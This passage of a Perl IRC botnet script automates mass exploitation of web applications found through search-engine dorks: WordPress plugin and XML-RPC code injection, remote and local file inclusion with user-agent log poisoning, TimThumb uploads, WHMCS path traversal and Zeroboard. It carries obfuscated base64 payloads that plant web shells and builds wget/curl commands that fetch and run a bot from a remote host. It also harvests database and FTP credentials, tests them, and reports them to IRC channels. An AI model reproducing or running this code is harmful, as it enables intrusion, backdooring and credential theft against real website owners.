992. if ($num > 0){
993. foreach my $site(@totexploit){
994. $count++;
995. if ($count == $num-1) { &msg("$chan","$ihlogo $engine Finished for $dork "); }
996. my $ihxxx = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92eks2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZHk1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdWF1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNjF2Y09oeEJLWW4zTjE5WklpcC91RUdxWG9QcjJNRmMvSVltc3NzU0JtcmN2alFhZlJDa2Q0MnJrVC9Sc1NNdm5Jc0pDNml6dE93TnF2MDRDNXFaV2F5bDhjZTMzS2VMRmVJTjYvTnlyeHFkdU16dS9CNk5aV3NrOHdIQnVjR2toSE1tNmJadUNFNThQK3pTaTY2UDhaWEo5ZEJZNlpoWlFwelltL1UvVUc1K09yNEcwVURRZURrV2J2MGM2aVBPQWl5U3FBNHJQaWJKa3hEOFljcDFFeUs3UE50MEo1d0xaNjRBZU8wUEdiVStqWWpoQ0FrbXhPZFVwbW5iSFRzZmhRRkF0T0RsVjFkeWZobkhKTXQzQzkzWWswZjloYVdwc1dZOWtVLzRmNXY1Q2t5T0RVZnY1Z1BnQThwZDRxdDFTN25jbUszQUp3UjhHaCs5U2xIclFhZ1FIMDBjYm90ajNhZm5pT01SQ2dtWXFudm9tVUwrRVJJcXhGYTVUTTFzN1oxODdOc3Q2VUR3OFJFa1U4MXFneVZOcmVEak90VWFKdXBaRmxBY2tJemt1eVZlMTlXTkJ4SjdKSStWZFlUQmJLVXYrKzAyVE1RQnJYSHZveUpveXJmV09FRHNsbkpRVk9pd2ZnNW9TZk51eHoybmo3dDBYYzNmMmZISUQrZnBJNkVWZm1nSEV5SnptdUUwUDZCdmNyaVkwR1BxV25yd3R0WHVSc0xOSlR3QzRYY3FXSlhwYk1wNXA5MFpTZ3hqNWE4cFJoZThOM2t2TzEzOGFoNURIT0t2UDdBZkFkck96VU9kbXVsTUVCbVJCc2xYWmV3b3ZINEE3U1M4ZGE1Vm83Mk0xL3REQXVzeUpCeVFYUG1IYWpnK2dYM2N4c21qSkVTcXQ1N1Z1QUtmQjROODRtL3FSb3pnODIycXRJWExPRmJoK1R6U0kyNHFPYWxuMzBlSjFVc0FVK1E1SnhzVVcranJjSXRzamFWQ2R0cGExNmExamVqUldMaXQwNmx0d3MyY293Ulk3YnZsemZnYjJXcWFQaDFPVUE2Y2s0ekVYR0xSemVPbzBremozZ0RNak1ibDQ4c3NoVGRIYUVBUGViRkoyWGthWEI1bDFJNDVrMGFERS9KQlJwZVBkVk14WHdsbkVwN29WMGJ4Y3kyZktIU0pMQXYwQlJnOG43T2h3c3IrTWVvU2ZrMmR5MkZ5TFhVTitvREdyRVZVazc4OVM4dVlEVnJLU0lmZUZYSzJ1ekxKVnp1Yk5FWWJlVWVXWUw0clRFa3NWcFJUQXlXWnp5anc0UDN4Rk1MUERwbmNIYlF5NG1ZcS9wbllhL0diUFQ1TER0ZkR6OUZ3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcuL2xvYmV4LnBocCcsJ3cnKTsKZndyaXRlKCRmaWNoaWVyLCAkYyk7CmZjbG9zZSgkZmljaGllcik7Cg";
997. my $ihcek = "JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZWNobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK";
998. my $vuln = "http://".$site.$bug."?action=log-reset&type=ih_options();eval(base64_decode(".$ihxxx."));error";
999. my $cekih = "http://".$site.$bug."?action=log-reset&type=ih_options();eval(base64_decode(".$ihcek."));error";
1000. my $shell = "http://".$site."wp-content/plugins/is-human/lobex.php";
1001. my $coba = &get_content($cekih);
1002. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
1003. if ($coba =~ /Array<br>(.*?)<br>(.*?)gid=/){ my $uname = $1; my $uid = $2; &get_content($vuln);sleep(1);
1004. &msg("$chan","$ihlogo $engine Exploiting http://$site ");
1005. my $res = &get_content($shell);sleep(1);
1006. if ($res =~ /UnKnown - Simple Shell/){
1007. &msg("$chan","$ihlogo $engine <=> SheLL <=> $shell ");
1008. } else { &msg("$chan","$ihlogo $engine <=> Vuln <=> $site <=> Os=$uname $uid ");
1009. }
1010. }
1011. } exit;
1012. }
1013. }
1014. }
1015. }
1016. sub rfi_exploit() {
1017. my $chan = $_[0];
1018. my $bug = $_[1];
1019. my $simpan = $_[2];
1020. my $dork = $_[3];
1021. my $engine = $_[4];
1022. my $count = 0;
1023. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
1024. my $num = scalar(@totexploit);
1025. if ($num > 0){
1026. foreach my $site(@totexploit){
1027. $count++;
1028. if ($count == $num-1) { &msg("$chan","$rfilogo $engine Finished for $dork "); }
1029. my $coba = "http://".$site.$bug."test??";
1030. my $test = "http://".$site.$bug.$injector."??";
1031. my $dor = "http://".$site.$bug.$botshell."??";
1032. my $cek = &get_content($coba);
1033. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
1034. &get_content($dor);sleep(1);
1035. if ($cek =~ /failed to open stream/) {
1036. my $check = &get_content($test);sleep(1);
1037. if ($check =~ /stunshell/i) {
1038. &os2($test,$chan,$engine,$rfilogo);
1039. }
1040. }
1041. } exit;
1042. }
1043. }
1044. }
1045. }
1046.  
1047. sub lfi_exploit() {
1048. my $chan = $_[0];
1049. my $bug = $_[1];
1050. my $simpan = $_[2];
1051. my $dork = $_[3];
1052. my $engine = $_[4];
1053. my $count = 0;
1054. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
1055. my $num = scalar(@totexploit);
1056. if ($num > 0){
1057. foreach my $site(@totexploit){
1058. $count++;
1059. if ($count == $num-1) { &msg("$chan","$lfilogo $engine Finished for $dork "); }
1060. my $dir = "../../../../../../../../../../../../../../../../../../../../../../../../";
1061. my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
1062. my $shell = "http://".$site.$bug.$dir."/tmp/lobex%0000";
1063. my $html = &get_content($test);
1064. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
1065. if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {
1066. my $res = lfi_env_query($test);
1067. # &lfi_spread_query($test);
1068. if ($res =~ /c0li#(.*?)#c0li(.*?)SUCCESS/) {
1069. my $os = $1;
1070. my $uid = $2;
1071. my $lficheck = &get_content($shell);
1072. if ($lficheck =~ /UnKnown - Simple Shell/){
1073. &msg("$chan","$lfilogo $engine <=> SheLL <=> $shell (OS=$os) $uid ");
1074. } else {
1075. &msg("$chan","$lfilogo $engine <=> Vuln <=> $site (OS=$os) $uid ");
1076. }
1077. }
1078. }
1079. } exit; }
1080. }
1081. }
1082. }
1083. sub lfi_env_query() {
1084. my $url = $_[0];
1085. my $code = 'JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWxkUXVOVEZIMHVFdjl1bUZPeW93V0hla2gyQldScEtURWxkeUUwUWZvQ3lHWHNWaktMUGJaenhuRkd4SC92dlROcFZaYUYwbmZ6RXVmZVpyL09uTGxCOTNDNUtHcHFGRWFLRnlKRk9wYmFlaC92N2pBcEN4bFdTUlpGWmpGcUQ5SElkTVRkNDFjeDdiYWlNQWpEd2ZEeTJwbkduK003NTdiZC91RnVhcWRvenhYWFZrUUpXbnhsQ0U2dEpadkNJd2FNL2dwVDEvUjhQTDZLem9maG1ONmltNHZQVys1RThPY2tDTWZSY1RTd2dIYVJyZ0JPNHpRbXEwdk1DVkd3VVpNYmdha3huaUpaeFRPV0g2WU1vSis0NE5FY3VtZlFHT1ZTeXB4by8zaGdtenkwRkZncXlmVUswb2NuZEU1bk1ld0hrR0JyYVZPUEg0R0ZXYkZLUTVjQU1xV1pMSm4wb2VLaVEyMjZFbVRPM1BWUmp2Mk9RZnI5RWRCSHo4enVaeUVoeVZoT28rQnZPQTQyZ3ZLWWRDNjFzOE9oeEJJaVA4M1I2aVZTUWZjSk5WblJmVzBlSzU2UlgvRkxiMDRXVFpkVW5VSERGYkRXakdZakJrb2tjZktlYmlQMUZEZUNnR2hEbHdGbTB5czFuVDg3OXZxVW44aHRobXYzenJERWRHRWpuZCtDOGJXVGNZVmdLQnRIalNvcW1iQmFIVGpoNlhWak5ZN09CbjhFbHljWGdYQzBrREtsT2ZHZlEvM2g2ZVFpdUJ4VW8rRmo3Tnh0dExNc0Q3aFZzZ3FnK0t4clhuUE1BNW1qVnlTek5OdHQrOFFtZWRzQnZxT0VqdDRrb1NNcklRQWxpNExRcnVZNmNMMkorRjBVV0U0T1ZYVnRKK0dDY2t5M2NMMDRVZzJmRldQSkZQK2IrVCtScE1qZ3RINzhZRDY5N3JSVXZXaGFqMms3UnJCV0U5d0NjRWZCYnZ2VXBSNk1HSUVCYTlIRzZMWTkybjU0alFrRXdCQVZRbjJUS1YvQkkzRkxsL0FvbVQ4NTUxODdOOXR0UmowOFBDaFY4VGlqeWh4eWV6dk5yQktKaGtoVHlpVVVJNml0Y1puYWU1YWd5U3F4U1BsWFdFd1d5bEwvdnROa2pCQ05lQTk5R1JQRzFUNXJqdzdKWnlVRlRvc0g0T1p4SHpic1UrVzEvVnNsWVdIK1dBMUF2MXlrTG9TVU9VQ1p6RmFPZUFTWXZzSzlWMi9EZ1VKMjcyaFBRb3M4ajFMYUVOamxvcXcwMGF1UytVZXpMNW9TNU5pblZwN1NlbUpMV21iKzVMZHNLTG1QczhyOHZnTjhCenZyT2NmYm5USTRJSk1pcnpMTldHdmhHTnhPR3V1NDZid1pCNmY1bHhFbWNrbkVLVG5qR1ROd1p4RDllWm9GUWtZbTZtR1Y3WDBMTUlQNDJvM2F4SiswcnZuQmMzdTFpMWkyTk5GVWNiT0pqZnpJcG8xKy8xaGRWTEFsUGtPU2NiRkZ2bzYzQW5tVHRZOUI5WnBiTy9BV3ZSdXJGUm03YVhsanMxd3JFNUZsM1BMbDB4M1llSmsrbXBpNkhRaHRNQTZ6akdUN2h0ZEJVSWxtQ3pnRE1qck1pM3NXMmV3c2pSRGdmak5SNTNKeHcyRGpycnZ4V1ptNm1lK1NDcWUxZTZSRUJid2RUSXA3NFpIWVVsbTIvRzZWSlBEWGgzVXdiRituZytWbzFDZjBtRHlhMi9hTTVFMzBEY3RqVkF4eXRUTkN6UnVyWG5pbGNac0srcmxFMEtINXdMSkp1T01qOW9VbExuTXlXODJLcUlPeFovTVZXUDVVUlNkRzVDQ0xuUmNTZit6OUF3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcvdG1wL2xvYmV4JywndycpOwpmd3JpdGUoJGZpY2hpZXIsICRjKTsKZmNsb3NlKCRmaWNoaWVyKTsK';
1086. my $ua = LWP::UserAgent->new(agent => "<?echo 'c0li#'.php_uname().'#c0li'.get_current_user();eval(base64_decode('".$code."'));echo 'SUCCESS';?>");
1087. $ua->timeout(7);
1088. my $req = HTTP::Request->new(GET => $url);
1089. my $res = $ua->request($req);
1090. return $res->content;
1091. }
1092.  
1093. sub xml_exploit() {
1094. my $chan = $_[0];
1095. my $bug = $_[1];
1096. my $simpan = $_[2];
1097. my $dork = $_[3];
1098. my $engine = $_[4];
1099. my $count = 0;
1100. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
1101. my $num = scalar(@totexploit);
1102. if ($num > 0){
1103. foreach my $site(@totexploit){
1104. $count++;
1105. if ($count == $num-1) { &msg("$chan","$xmllogo $engine Finished for $dork "); }
1106. my $test = "http://".$site.$bug;
1107. my $vuln = "http://".$site." 12".$bug;
1108. my $html = &get_content($test);
1109. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
1110. if ($html =~ /faultcode/i ) {
1111. my $resp = &xml_cek_query2($test);
1112. if ($resp =~ /Byroe(.*)Lobex/s) {
1113. # &xml_spread_query($test);sleep(1);
1114. my $sys = $1;
1115. my $shell = "http://".$site."/lobex.php";
1116. my $check = &get_content($shell);
1117. if ($check =~ /UnKnown - Simple Shell/) {
1118. my $safe = ""; my $os = ""; my $uid = "";
1119. if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
1120. if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
1121. if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
1122. &msg("$chan","$xmllogo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
1123. &msg("$admin","$xmllogo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
1124. }
1125. # else {
1126. # &msg("$chan"," 0,1$xmllogo( 4@ 8$engine 15) 15( 13@ 12SysTem 15) 10 ".$vuln." 3".$sys); sleep(1);}
1127. }
1128. }
1129. } exit;
1130. }
1131. }
1132. }
1133. }
1134.  
1135. sub xml_cek_query() {
1136. my $url = $_[0];
1137. my $code = "system('uname -a');";
1138. my $ua = LWP::UserAgent->new(agent => 'perl post');
1139. $exploit = "<?xml version=\"1.0\"?><methodCall>";
1140. $exploit .= "<methodName>test.method</methodName>";
1141. $exploit .= "<params><param><value><name>',''));";
1142. $exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";
1143. $ua->timeout(7);
1144. my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
1145. return $res->content;
1146. }
1147.  
1148. sub xml_cek_query2() {
1149. my $url = $_[0];
1150. my $string = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92eks2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZHk1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdWF1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNjF2Y09oeEJLWW4zTjE5WklpcC91RUdxWG9QcjJNRmMvSVltc3NzU0JtcmN2alFhZlJDa2Q0MnJrVC9Sc1NNdm5Jc0pDNml6dE93TnF2MDRDNXFaV2F5bDhjZTMzS2VMRmVJTjYvTnlyeHFkdU16dS9CNk5aV3NrOHdIQnVjR2toSE1tNmJadUNFNThQK3pTaTY2UDhaWEo5ZEJZNlpoWlFwelltL1UvVUc1K09yNEcwVURRZURrV2J2MGM2aVBPQWl5U3FBNHJQaWJKa3hEOFljcDFFeUs3UE50MEo1d0xaNjRBZU8wUEdiVStqWWpoQ0FrbXhPZFVwbW5iSFRzZmhRRkF0T0RsVjFkeWZobkhKTXQzQzkzWWswZjloYVdwc1dZOWtVLzRmNXY1Q2t5T0RVZnY1Z1BnQThwZDRxdDFTN25jbUszQUp3UjhHaCs5U2xIclFhZ1FIMDBjYm90ajNhZm5pT01SQ2dtWXFudm9tVUwrRVJJcXhGYTVUTTFzN1oxODdOc3Q2VUR3OFJFa1U4MXFneVZOcmVEak90VWFKdXBaRmxBY2tJemt1eVZlMTlXTkJ4SjdKSStWZFlUQmJLVXYrKzAyVE1RQnJYSHZveUpveXJmV09FRHNsbkpRVk9pd2ZnNW9TZk51eHoybmo3dDBYYzNmMmZISUQrZnBJNkVWZm1nSEV5SnptdUUwUDZCdmNyaVkwR1BxV25yd3R0WHVSc0xOSlR3QzRYY3FXSlhwYk1wNXA5MFpTZ3hqNWE4cFJoZThOM2t2TzEzOGFoNURIT0t2UDdBZkFkck96VU9kbXVsTUVCbVJCc2xYWmV3b3ZINEE3U1M4ZGE1Vm83Mk0xL3REQXVzeUpCeVFYUG1IYWpnK2dYM2N4c21qSkVTcXQ1N1Z1QUtmQjROODRtL3FSb3pnODIycXRJWExPRmJoK1R6U0kyNHFPYWxuMzBlSjFVc0FVK1E1SnhzVVcranJjSXRzamFWQ2R0cGExNmExamVqUldMaXQwNmx0d3MyY293Ulk3YnZsemZnYjJXcWFQaDFPVUE2Y2s0ekVYR0xSemVPbzBremozZ0RNak1ibDQ4c3NoVGRIYUVBUGViRkoyWGthWEI1bDFJNDVrMGFERS9KQlJwZVBkVk14WHdsbkVwN29WMGJ4Y3kyZktIU0pMQXYwQlJnOG43T2h3c3IrTWVvU2ZrMmR5MkZ5TFhVTitvREdyRVZVazc4OVM4dVlEVnJLU0lmZUZYSzJ1ekxKVnp1Yk5FWWJlVWVXWUw0clRFa3NWcFJUQXlXWnp5anc0UDN4Rk1MUERwbmNIYlF5NG1ZcS9wbllhL0diUFQ1TER0ZkR6OUZ3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcuL2xvYmV4LnBocCcsJ3cnKTsKZndyaXRlKCRmaWNoaWVyLCAkYyk7CmZjbG9zZSgkZmljaGllcik7Cg==";
1151. my $ua = LWP::UserAgent->new(agent => 'perl post');
1152. $exploit = "<?xml version=\"1.0\"?><methodCall>";
1153. $exploit .= "<methodName>test.method</methodName>";
1154. $exploit .= "<params><param><value><name>',''));";
1155. $exploit .= "echo 'Byroe';echo(php_uname());eval(base64_decode('$string'));echo 'Lobex';exit;/*</name></value></param></params></methodCall>";
1156. $ua->timeout(7);
1157. my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
1158. return $res->content;
1159. }
1160.  
1161. sub xml_spread_query() {
1162. my $xmltargt = $_[0];
1163. my $xmlsprd = "system('wget ".$injector." -O lobex.php;fetch ".$injector.";mv bad.txt lobex.php;wget ".$botshell." -O tmp.php;fetch ".$botshell.";mv bot.txt tmp.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf bot.txt;wget ".$botshell.";php bot.txt;rm -rf bot.txt;curl -O ".$botshell.";php bot.txt;rm -rf bot.txt;lwp-download ".$botshell.";php bot.txt;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf bot.txt;wget ".$botshell.";php bot.txt;rm -rf bot.txt;curl -O ".$botshell.";php bot.txt;rm -rf bot.txt;lwp-download ".$botshell.";php bot.txt;');";
1164. my $userAgent = LWP::UserAgent->new(agent => 'perl post');
1165. $exploit = "<?xml version=\"1.0\"?><methodCall>";
1166. $exploit .= "<methodName>test.method</methodName>";
1167. $exploit .= "<params><param><value><name>',''));";
1168. $exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*</name></value></param></params></methodCall>";
1169. $userAgent->timeout(7);
1170. my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
1171. }
1172.  
1173. sub thumb_exploit() {
1174. my $chan = $_[0];
1175. my $bug = $_[1];
1176. my $simpan = $_[2];
1177. my $dork = $_[3];
1178. my $engine = $_[4];
1179. my $count = 0;
1180. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
1181. my $num = scalar(@totexploit);
1182. if ($num > 0){
1183. foreach my $site(@totexploit){
1184. $count++;
1185. my $vuln = "http://".$site.$bug."?src=".$thumbshell;
1186. my $botis = "http://".$site.$bug."?src=".$botid;
1187. my $botxc = "http://".$site.$bug."?src=".$botxid;
1188. my @nbug = split(/\//,$bug);
1189. my $cek = &get_content($vuln);
1190. if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
1191. if ($cek =~ /Unable to open image(.*?)$nbug[0](.*?)$md5php/i){
1192. &msg("$chan","$thumblogo $engine Exploiting http://$site ");
1193. my $pdir = $2;
1194. if ($spreadMode == 1) { &get_content($botis); &get_content($botxc);sleep(1); }
1195. my $crut = "http://".$site.$nbug[0].$pdir.$md5php;
1196. my $botc = "http://".$site.$nbug[0].$pdir.$md5bot;
1197. my $botpc = "http://".$site.$nbug[0].$pdir.$md5botx;
1198. my $npath = "http://".$site."wp-includes/wp-script.php";
1199. my $check = &get_content($crut."?clone");sleep(1);
1200. if ($check =~ /stunshell/i){
1201. my $safe = ""; my $os = ""; my $uid = "";
1202. if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
1203. if ($check =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
1204. if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
1205. my $crot = &get_content($npath);sleep(1);
1206. if ($crot =~ /stunshell/i){
1207. &msg("$admin","$thumblogo $engine <=> sHeLL <=> ".$npath." (SafeMode=$safe) (OS=$os) uid=$uid ");
1208. &msg("$chanxxx","$thumblogo $engine <=> sHeLL <=> ".$npath." (SafeMode=$safe) (OS=$os) uid=$uid ");
1209. } else {
1210. &msg("$admin","$thumblogo $engine <=> sHeLL <=> ".$crut." (SafeMode=$safe) (OS=$os) uid=$uid ");
1211. &msg("$chan","$thumblogo $engine <=> sHeLL <=> ".$crut." (SafeMode=$safe) (OS=$os) uid=$uid ");
1212. }
1213. &get_content($botc);sleep(1);
1214. &get_content($botpc);sleep(1);
1215. }
1216. }
1217. } exit; }
1218. if ($count == $num-1) { &msg("$chan","$thumblogo $engine Finished for $dork "); }
1219. }
1220. }
1221. }
1222.  
1223. sub whmcs_exploit() {
1224. my $chan = $_[0];
1225. my $bug = $_[1];
1226. my $simpan = $_[2];
1227. my $dork = $_[3];
1228. my $engine = $_[4];
1229. my $count = 0;
1230. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$whmcslogo);
1231. my $num = scalar(@totexploit);
1232. if ($num > 0){
1233. foreach my $site(@totexploit){
1234. $count++;
1235. if ($count == $num-1) { &msg("$chan","$whmcslogo $engine Finished for $dork "); }
1236. my $test1 = "http://".$site.$bug."../../../configuration.php%00";
1237. my $submit = "http://".$site.$subticket;
1238. my $html = &get_content($test1);
1239. if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
1240. if ($html =~ /db_host/i) {
1241. my $userpass = &getUserPass($html); sleep(2);
1242. my $info = &getinfo($html); sleep(2);
1243. &msg("$chaninfo","$whmcslogo $engine <=> info [http://".$site."] $info");
1244. my $lulz = "http://".$site;
1245. my $user = ""; my $pass = ""; my $user2 = ""; my $pass2 = ""; my $dtbs2 = "";
1246. if($lulz =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
1247. my $host = $2;
1248. my @ftpu = split(":Viva-Byroe.Net:", $userpass);
1249. my @dbic = split(":Viva-Byroe.Net:", $info);
1250. $user = $ftpu[0]; $pass = $ftpu[1];
1251. $user2 = $dbic[0]; $pass2 = $dbic[1]; $dtbs2 = $dbic[2];
1252. my $ftpstat = "";
1253. if($user =~ /_/) { @userz = split("_", $user); $user = $userz[0];}
1254. &ftp_connect($test1,$host,$user,$pass,$chan,$engine,$whmcslogo);sleep(1);
1255. &dbi_connect($host,$user2,$pass2,$dtbs2,$chan,$engine,$whmcslogo);sleep(1);
1256. }
1257. my $ceksubmit = &get_content($submit);
1258. if ($ceksubmit =~ /Urgency/i) {
1259. &msg("$submitchan","$whmcslogo $engine <=> Submit Ticket [".$submit."]"); sleep(2);
1260. my $uploader = "http://".$site."/downloads/indexx.php";
1261. my $uploader2 = "http://".$site."/templates_c/indexx.php";
1262. my $cekup = &get_content($uploader);
1263. my $cekup2 = &get_content($uploader2);
1264. if ($cekup =~ /enctype=\"multipart\/form-data"/i) { &msg("$chanxxx","$whmcslogo $engine <=> Uploader [".$uploader."]");&msg("$admin","$whmcslogo $engine <=> Uploader [".$uploader."]"); }
1265. if ($cekup2 =~ /enctype=\"multipart\/form-data"/i) { &msg("$chanxxx","$whmcslogo $engine <=> Uploader [".$uploader2."]");&msg("$chanxxx","$whmcslogo $engine <=> Uploader [".$uploader2."]"); }
1266. }
1267. }
1268. } exit;
1269. }
1270. }
1271. }
1272. }
1273.  
1274. sub ftp_connect {
1275. my $url = $_[0];
1276. my $host = $_[1];
1277. my $user = $_[2];
1278. my $pass = $_[3];
1279. my $chan = $_[4];
1280. my $engine = $_[5];
1281. my $logo = $_[6];
1282. my $success = 1;
1283. use Net::FTP;
1284. my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 7);
1285. $success = 0 if $ftp->login($user,$pass);
1286. $ftp->quit;
1287. if ($success == 0) {
1288. &msg("$chanxxx","$logo $engine <=> FTP [http://".$host."] [".$user.":".$pass."]");
1289. }
1290. }
1291. sub dbi_connect () {
1292. my $host = $_[0];
1293. my $user = $_[1];
1294. my $pass = $_[2];
1295. my $dtbs = $_[3];
1296. my $chan = $_[4];
1297. my $engine = $_[5];
1298. my $logo = $_[6];
1299. my $port = "3306";
1300. my $platform = "mysql";
1301. my $dsn = "dbi:$platform:$dtbs:$host:$port";
1302. my $DBIconnect= DBI->connect($dsn,$user,$pass);
1303. if ($DBIconnect) {
1304. &msg("$chanxxx","$logo $engine <=> MySql [http://".$host."] [Connected]");
1305. }
1306. }
1307. sub getUserPass() {
1308. my $string = $_[0];
1309. my @lol = split("\r\n", $string);
1310. my $pass = "";
1311. my $user = "";
1312. foreach my $line (@lol) {
1313. if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
1314. $pass = $3;
1315. }
1316. if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
1317. $user = $3;
1318. }
1319. }
1320. return $user.":Viva-Byroe.Net:".$pass;
1321. }
1322.  
1323. sub getinfo() {
1324. my $string = $_[0];
1325. my @lol = split("\r\n", $string);
1326. my $pass = "";
1327. my $user = "";
1328. my $dbs = "";
1329. foreach my $line (@lol) {
1330. if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
1331. $pass = $3;
1332. }
1333. if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
1334. $user = $3;
1335. }
1336. if(($line =~ m/db_name(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_name(.*?)=(.*?)"(.+?)";/i)) {
1337. $dbs = $3;
1338. }
1339. }
1340. return $user.":Viva-Byroe.Net:".$pass.":Viva-Byroe.Net:".$dbs;
1341. }
1342.  
1343. sub zero_exploit() {
1344. my $chan = $_[0];
1345. my $bug = $_[1];
1346. my $simpan = $_[2];
1347. my $dork = $_[3];
1348. my $engine = $_[4];
1349. my $count = 0;
1350. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zerologo);
1351. my $num = scalar(@totexploit);
1352. if ($num > 0){
1353. foreach my $site(@totexploit){
1354. $count++;
1355. if ($count == $num-1) { &msg("$chan","$zerologo $engine Finished for $dork "); }
1356. my $coba = "http://".$site.$bug;
1357. my $cek = &get_content($coba);sleep(1);
1358. if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
1359. if ($cek =~ /Zeroboard/) { system("./zbc $coba 80");sleep(1);
1360. my $vulner1 = "http://".$site.$action."?cmd=";
1361. my $vulner2 = "http://".$site.$action.$wgetdon;
1362. my $vulner3 = "http://".$site.$action.$lwpdon;
1363. my $vulner4 = "http://".$site.$action.$curldon;
1364. my $vuln1 = "http://".$site."/data/kekkaishi.php";
1365. my $check2 = &get_content($vulner1);
1366. if ($check2 =~ /Byroe Team/) {
1367. if ($zerowget == 1) { my $coba1 = &get_content($vulner2);sleep(2); }
1368. if ($zerolwp == 1 ) { my $coba2 = &get_content($vulner3);sleep(2); }
1369. if ($zerocurl == 1) { my $coba3 = &get_content($vulner4);sleep(2); }
1370. my $check1 = &get_content($vuln1);
1371. if ($check1 =~ /stunshell/i) {
1372. my $safe = ""; my $os = ""; my $uid = "";
1373. if ($check1 =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
1374. if ($check1 =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
1375. if ($check1 =~ m/uid=(.*?)gid=/) {$uid = $1;}
1376. &msg("$admin","$zerologo $engine <=> sHeLL <=> ".$vuln1." (SafeMode=$safe) (OS=$os) uid=$uid ");
